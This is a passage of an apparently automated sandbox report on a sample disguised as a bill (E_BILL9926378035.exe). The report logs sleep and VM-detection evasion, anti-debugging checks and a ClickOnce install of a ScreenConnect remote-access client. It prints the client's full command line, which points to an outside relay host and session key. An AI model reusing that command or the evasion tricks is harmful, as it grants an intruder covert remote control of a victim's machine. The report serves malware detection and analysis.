Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -599749s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -599639s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -599511s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -599403s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -599292s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -599136s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -598996s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -598713s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -598130s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -597153s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -595795s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -595685s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -595575s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -595468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -595358s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -595115s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -594994s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -594850s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -594516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -594406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -594188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -594078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -593969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -593844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -593734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -593624s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -593514s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -593406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -593297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -593188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -593063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -592953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -592844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -592719s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5436	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe TID: 7720	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe TID: 7756	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe TID: 7940	Thread sleep count: 366 > 30
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe TID: 7852	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599639	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599511	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599403	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599292	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599136	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598996	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598713	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598130	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597153	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595795	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595685	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595575	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595115	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594994	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594850	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593514	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592719	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: dfsvc.exe, 00000001.00000002.2602490344.000001F6CE643000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2608642594.000001F6D07F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2945866361.0000023333040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2944419995.000002332DA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2945908199.000002333305A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1997539109.00000000011FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: dfsvc.exe, 00000001.00000002.2608642594.000001F6D07E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW[Q
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Code function: 0_2_00EF4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00EF4573

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

0_2_00EF1000

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Code function: 0_2_00EF3677 mov eax, dword ptr fs:[00000030h]

0_2_00EF3677

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Code function: 0_2_00EF6893 GetProcessHeap,

0_2_00EF6893

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process token adjusted: Debug

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Code function: 0_2_00EF1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EF1493
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Code function: 0_2_00EF4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EF4573
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Code function: 0_2_00EF191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EF191F
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Code function: 0_2_00EF1AAC SetUnhandledExceptionFilter,	0_2_00EF1AAC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs	Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1928 -ip 1928	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 856	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

